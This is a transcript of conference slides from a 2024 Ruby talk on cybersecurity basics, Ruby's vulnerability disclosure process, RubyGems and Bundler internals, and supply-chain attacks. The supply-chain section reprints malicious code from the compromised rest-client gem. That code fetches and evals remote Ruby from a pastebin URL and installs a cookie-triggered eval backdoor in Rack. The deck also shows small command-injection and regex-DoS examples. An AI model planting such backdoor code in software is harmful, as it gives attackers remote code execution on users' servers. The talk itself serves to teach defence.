Introduction of Cybersecurity with Ruby at RedDotRubyConf 2024

Copyright © 2020 Present ANDPAD Inc.
Introduction of
Cybersecurity with Ruby
Hiroshi SHIBATA @hsbt
2024/07/25 RedDotRubyConf 2024

Hiroshi SHIBATA
https://hsbt.org
@hsbt
Ruby core team
RubyGems/Bundler team
Technical fellow at ANDPAD
Self introduction

I'm from Japan where is Ruby birth place

Introduction of ANDPAD

Supply chain attack
is
Serious issue today

Today's agenda

Basic knowledge
of
Cybersecurity

How inspect
vulnerability issues?

What’s CVE
CVE is “The Identify number for the potential vulnerability issue” by
MITRE
That’s all. It’s not impact or authority.

Important concept of Attack Surface and Vector
Attack Surface
Software/System/Application
Attack Surface
Attack Vector
Attack Vector
Attack Vector
Attacker

What's CIA Triad?
We should consider what effects CIA
Triad
• Con
fi
dentiality
• Integrity
• Availability
We will do care CVE for our software
with attack surface/vector and CIA
https://devopedia.org/information-security-principles

How handle
vulnerability in OSS?

We receive vulnerability report on h1
We have “security@ruby-lang.org”
for security report. We received
buffer overflow, memory leak,
escape string etc etc…
We’ve been use
https://hackerone.com/ruby
It has bounty program provided
by IBB(The Internet Bug
Bounty).

Triage
What’s vulnerable with your
report? We look the
following section generally.
• Description
• PoC of vulnerable code
• Impact for users

Example case of vulnerability
Regex DoS
Directory Traversal
OS command injection
Tempfile.create(“../../home/matz/blue") {|f| p f.path}
if localfile
# If localfile is “| oscommand” string
# open method can execute oscommand with old Ruby
f = open(localfile, “w")
end
time ruby -e '/^(a|a)*$/ =~ "a" * 10 + “b"' => 200msec
time ruby -e '/^(a|a)*$/ =~ "a" * 30 + “b"' => unresponsive with old Ruby

Triage policy
We always consider the followings:
• Some scam reporter report old vulnerability as copy&paste. We carefully
to triage that.
• How effect to CIA(Con
fi
dentiality/Integrity/Availability)
• The decision of other language and libraries. We always refer Python
and Go and others

Rejected case
• Server/Cloud con
fi
guration: Allow to
see DirectoryIndex on our servers
• SSL & Certi
fi
cation con
fi
guration:
weak algorithm is enabled
• Report for other projects: Like Rails,
Rack or some gems.

Complex case
Segmentation fault
The potential vulnerability discovered by ASAN

Code
We are working to resolve the vulnerability with private
• Discuss with the original reporter
• Avoid to lead the another vulnerability or bug

Coordinate to stakeholders
• MITRE for assigning CVE
• Distribution maintainer
• RedHat, Debian, etc
• Service Provider
• AWS, GitHub, CircleCI, etc
• Other implementation like JRuby,
Truf
fl
eRuby
• Decide to release date

Publish announcement for vulnerabilities
• Publish announcement
• We should write a formal
information for disclosing
vulnerability
• We monitor actions by users,
distributors and platform
services continuously

Disclose
We always coordinate to disclose vulnerability to the original reporter.
After disclosing, we completely
fi
nished to handle vulnerability with CVE
assignment.

Package/Library
management of Ruby

How Ruby runtime
load external library?

Basic knowlege of require
• `require` is major method in Ruby.
• `require` can handle Ruby
and C/Rust extension with
your platform like linux or
macOS.
• `require` find $LOAD_PATH by
your installation path originally
>> require 'rss'
=> true
>> require 'rss'
=> false
>> require "bigdecimal"
=> true
#
>> require "bigdecimal.bundle"
=> true
#
>> require "bigdecimal.so"
=> true

Classification of Ruby core library
Embedded Class
• String
• Time
• ...
Standard Library
• URI
• JSON
• RSS
• ...
Ruby
C extension Library
• JSON
• OpenSSL
• ...
Pure Ruby Library
• URI
• FileUtils
• ...

We have RubyGems
• RubyGems is a package/library for the Ruby programming language
• We can install gems from rubygems.org today.
• gemspec is a file describing Gem::Specification
• This class for defining metadata including name, version, platform, etc.
>> Gem.loaded_specs["rack"]
=>
Gem::Speci
fi
cation.new do |s|
s.name = "rack"
s.version = Gem::Version.new("2.2.8")
s.installed_by_version = Gem::Version.new("3.4.10")
s.authors = ["Leah Neukirchen"]
s.date = Time.utc(2023, 7, 31)
s.dependencies = [...(snip)...]
s.description = "Rack provides a minimal, modular and adaptable interface for developingnweb applications in Ruby. By
wrapping HTTP requests and responses innthe simplest way possible, it uni
fi
es and distills the API for webnservers, web
frameworks, and software in between (the so-callednmiddleware) into a single method call.n"
(...snip...)
end

• My environment have 2800+ gems. RubyGems search them.
How load libraries by rubygems? What's happend?
• RubyGems extend `require` method for loading gem for us. This
extension will find all of your gems at Gem::specification.find_by_path
def self.find_by_path(path)
path = path.dup.freeze
spec = @@spec_with_requirable_file[path] ||= stubs.find do |s|
s.contains_requirable_file? path
end || NOT_FOUND
spec.to_spec
end
This returns all of your gemspec
$ ruby -e "t = Time.now; require 'bigdecimal'; p Time.now - t"
0.272687
$ ruby --disable-gems -e "t = Time.now; require 'bigdecimal'; p Time.now - t"
0.000786

Introduction of Lockfile
• Ruby has two package manager for Ruby library
• RubyGems: It’s a package/library for the Ruby programming language. We can install
gems from rubygems.org today
• Bundler: It is also package manager for the Ruby, It focused version locking and
dependency resolution with Gemfile
# Gemfile
# frozen_string_literal: true
source "https://rubygems.org"
gem "rss"
# Gemfile.lock
GEM
remote: https://rubygems.org/
specs:
rexml (3.2.5)
rss (0.2.9)
rexml
PLATFORMS
arm64-darwin-23
DEPENDENCIES
rss
BUNDLED WITH
2.5.6

What's PubGrub?
• PubGrub is next generation resolution engine
developed by Natalie Weizenbaum a.k.a @nex3.
• PubGrub is for Dart language. But we
have Ruby implementation that is
`pub_grub`.
• If resolution conflict occurs with PubGrub,
PubGrub give up immediately to resolving loop.
This makes faster resolution with complex
Gemfile.
https://nex3.medium.com/pubgrub-2fb6470504f

Bundler uses PubGrub for dependency resolver
source = PubGrub::StaticPackageSource.new do |s|
s.add 'foo', '2.0.0', deps: { 'bar' => '1.0.0' }
s.add 'foo', '1.0.0'
s.add 'bar', '1.0.0', deps: { 'foo' => '1.0.0' }
s.root deps: { 'bar' => '>= 1.0.0' }
end
solver = PubGrub::VersionSolver.new(source: source)
result = solver.solve
p result
#=> {#<PubGrub::Package :root>=>0, "bar"=>#<Gem::Version "1.0.0">,
"foo"=>#<Gem::Version "1.0.0">}
• This is basic scenario of dependency resolution.
• We can see Resolution with PubGrub::VersionSolver and package source definition
provided by PubGrub.

Easy scenario of PubGrub
I want
bar-1.0.0 or
higher
bar-1.0.0 foo-1.0.0
foo-2.0.0
• We want to use `bar >= 1.0.0`. bar-1.0.0 wants foo-1.0.0.
• We can get resolution result that is `bar-1.0.0` and `foo-1.0.0`.

Conflict scenario of PubGrub
s.add 'foo', '2.0.0', deps: { 'bar' => '1.0.0' }
s.add 'foo', '1.0.0'
s.add 'bar', '1.0.0', deps: { 'foo' => '1.0.0' }
s.root deps: { 'foo' => '>= 2.0.0' }
end
p result
#=> pub_grub/version_solver.rb:233:in `resolve_conflict': Could not find compatible
versions (PubGrub::SolveFailure)
• This is conflict scenario of dependency resolution.
• If PubGrub couldn't resolve their versions, it raises `SolveFailure`.

Easy scenario of PubGrub
I want
foo-2.0.0 or
higher
bar-1.0.0
foo-1.0.0
foo-2.0.0
• We want to use `foo >= 2.0.0`.
• But foo-2.0.0 wants bar-1.0.0, and bar-1.0.0 wants foo-1.0.0.
This is not
foo-2.0.0

A bit of complex scenario of PubGrub
s.add 'foo', '3.0.0', deps: { 'bar' => '> 1.0.0' }
s.add 'foo', '2.0.0', deps: { 'bar' => '1.0.0' }
s.add 'foo', '1.0.0'
s.add 'bar', '1.0.0', deps: { 'foo' => '1.0.0' }
s.add 'bar', '2.0.0'
s.add 'buzz', '1.0.0', deps: { 'foo' => '> 1.0.0' }
s.root deps: { 'buzz' => '1.0.0' }
end
p result
#=> {#<PubGrub::Package :root>=>0, "buzz"=>#<Gem::Version "1.0.0">, "foo"=>#<Gem::Version
"3.0.0">, "bar"=>#<Gem::Version "2.0.0">}
• This is additional scenario for PubGrub. We have three versions of foo, two versions of bar, and buzz.

I want
buzz-1.0.0
buzz-1.0.0 foo-1.0.0
foo-2.0.0
foo-3.0.0
bar-1.0.0
bar-2.0.0
This is not foo
> 1.0.0 for buzz
We want to use buzz-1.0.0, buzz-1.0.0
wants foo > 1.0.0. PubGrub resolve it
with foo-2.0.0 or foo-3.0.0, But foo-2.0.0
conflicts with bar-1.0.0.

I want
buzz-1.0.0
buzz-1.0.0 foo-1.0.0
foo-2.0.0
foo-3.0.0
bar-1.0.0
bar-2.0.0
We finally get buzz-1.0.0,
foo-3.0.0 and bar-2.0.0
as resolution result.

Why Ruby try to easily
update core libraries?

History of library volume for Ruby language
We bundled a lot of library at Ruby 1.8 because we don't have
rubygems.org yet.
Ruby 1.6 Ruby 1.8 Ruby 2.7 Ruby 3.3
Pure Ruby 63 104 65 56
C extensions 15 26 34 29

Why
Embedded Class
• String
• Time
• ...
Standard Library
• URI
• JSON
• RSS
• ...
Ruby
C extension Library
• JSON
• OpenSSL
• ...
Pure Ruby Library
• URI
• FileUtils
• ...
Difficult to
remove/update
this
Easy to remove
update this
Easy to remove/update this
and affect with 3rd
party libraries

Classification of Standard library in 2024
Embedded Class
• String
• Time
• ...
Standard Library
• URI
• JSON
• RSS
• ...
Ruby
Standard Libraries
• Pure Ruby
• mkmf
• RbConfig
• C extension
• Ripper
• coverage
Default/Bundles Gems
• Pure Ruby
• URI
• RSS
• C extension
• JSON
• Racc

What's Default gems
• The Ruby core team released "Default gems" to the rubygems.org.
• You can install standard libraries of Ruby via RubyGems.
• Default gems are openssl, psych, json, etc… You can see all of
default gems at https://stdgems.org/
• Rubygems have a detection method for default gems.
>> require 'rss'
=> true
>> Gem.loaded_specs["rss"].default_gem?
=> false
>> require 'openssl'
=> true
>> Gem.loaded_specs["openssl"].default_gem?
=> true

How develop the default gems
$ bundle install
$ rake test
ruby/* repositories can develop
bundler and rake same as your
application.
Default gems repository is located
under the https://github.com/ruby

What's Bundled gems
• We bundled *.gem and
unpacked
fi
les to tarball
package for Bundled gems
with `gems/bundled_gems`
in ruby/ruby repository like
this:
• `make install` installed
Bundled gem your box.

The major problem for the bundled gems
If you use Bundler, you need to add the bundled gems into your Gem
fi
le.
source "https://rubygems.org"
gem “rss” # You need to this because rss is bundled gems
# gem "openssl" # You can load openssl without this line
gem "bigdecimal" # You need to this always after Ruby 3.4
…
I need to consider to transition and migration plan for this.
But I have no idea yet. Maybe, I will add the some mechanism to Bundler internal
to care about this.

Transition status of default/bundled gems
We will reduce Standard Library and extract them to default and bunlded gems
Ruby 2.7 Ruby 3.3 Ruby 3.4 Ruby 3.5
Standard
Library
51 18 18 18
Default gems 48 67 55 45(?)
Bundled
gems
6 16 28 38(?)

Why we need to default gems and bundled gems?
Security Sustainability

Nebraska problem and
Supply chain attack

How to inject malicious
code into your application?

Nebraska problem
This figure depicts the existence of
open source projects that have many
bugs, even though they are widely
used.
https://www.jstage.jst.go.jp/article/abas/21/5/21_0220914a/_pdf

left-pad problem
• Left-pad was a tiny NPM package with just 11
lines of code.
• Surprisingly, many popular libraries
like Babel and React depended on this seemingly
simple package.
• Then, one day, the package was removed from
NPM, and chaos ensued. Applications and widely-
used open-source infrastructure broke because
they couldn’t obtain this dependency.
module.exports = leftpad;
function leftpad (str, len, ch) {
str = String(str);
var i = -1;
if (!ch && ch !== 0) ch = ' ';
len = len - str.length;
while (++i < len) {
str = ch + str;
}
return str;
}

All of programming language have risk for Nebraska problem
I want
rails-7.0.8
and
importmap-
rails-1.2.1
rails-0.8.0
activerecord-...
rails-7.0.8
・
・
・
importmap-rails-0.1.0
・
・
・
importmap-rails-1.2.1
activemailer-...
activesupport-...
actionview-...
railties-...
actionpack-...
mini_mime-...
mail-...
minitest-...
tzinfo-...
thor-...
rake-...

Real case of supply-chain attack
Example case of rest-client as CVE-2019-15224

How inject malicious code?
def _!;
begin;
yield;
rescue Exception;
end;
end
_!{
Thread.new {
loop {
_!{
sleep rand * 3333;
eval(
Net::HTTP.get(
URI('https://pastebin.com/raw/xa456PFt')
)
)
}
}
} if Rails.env[0] == "p"
}

Realcase of malicious code
_! {
unless ENV["URL_HOST"].to_s.include?("localhost")
unless defined?(ZZZ)
require "openssl"
require "base64"
public_key = OpenSSL::PKey.read(Base64.urlsafe_decode64("LS0t...(snip)..tCg=="))
Rack::Sendfile.prepend Module.new {
define_method(:call) { |e|
_! {
signature, payload, = e["HTTP_COOKIE"].match(/__session=(.+);/)[1].split(",")
signature = Base64.urlsafe_decode64(signature)
payload = Base64.urlsafe_decode64(payload)
if public_key.verify(OpenSSL::Digest.new("sha256"), signature, payload)
payload = JSON.parse(payload)
if (Time.now.to_i - payload["timestamp"]) <= 60
eval(payload["ruby"])
end
end
}
super(e)

What’s CVE
rubygems.org was attacked with pawned password.
“My RubyGems.org account was using an insecure, reused password that
has leaked to the internet in other breaches."
https://news.ycombinator.com/item?id=20745768
Typo squatting
• activesupport: active-support, active_support, ...
• bundler: bandler, bunder, ...

Recent attacks
RubyGems team improve the our security
level like MFA support and invest
cybersecurity with supported company like
AWS

What are notable features of latest RubyGems and Bundler
• Generate checksums
• You can see them with `CHECKSUMS`
section into your lockfile manually.
• A lot of Bugfix! 🐛
Gemfile.lock

What we do against
malicious code?

How we do that?
Enable SAST and DAST (Static/Dynamic application security test) tools.
I recommend to check with `scorecard` cli by OpenSSF at first.
$ scorecard --repo=github.com/ruby/ruby
https://github.com/ossf

How we do that?
How do you check the security of the open source packages that you use?
What security tools do you regularly use when developing open source software?
https://www.linuxfoundation.org/research/maintainer-perspectives-on-security

How we do that?
Dependency monitoring
continuously.
RubyGems team triage all changes
of published gems everyday with
diffend.io.
You should confirm that or github
diff before you deploy new version of
dependencies.
Ex. hfc 1.8.0 → 2.9.0
https://my.diffend.io/gems/hfc/1.8.0/2.9.0/

How we do that?
Join the security community and write secure code.
OWASP:
https://owasp.org/www-project-top-ten/
https://owasp.org/www-project-developer-guide/release/
OpenSSF:
https://github.com/ossf/scorecard
Others:
https://osv.dev/
https://github.com/rubysec/ruby-advisory-db

Wrap up

Conclusion
• I talked about...
• The fundamental of Cybersecurity like CVE and CIA
• The state of Package manager and libraries of Ruby
• How/What we do for Cybersecurity or Nebraska problem
< Ruby is a programmer's best friend

Introduction of Cybersecurity with Ruby at RedDotRubyConf 2024

More Related Content

Similar to Introduction of Cybersecurity with Ruby at RedDotRubyConf 2024 (20)

More from Hiroshi SHIBATA (15)

Recently uploaded (20)

Introduction of Cybersecurity with Ruby at RedDotRubyConf 2024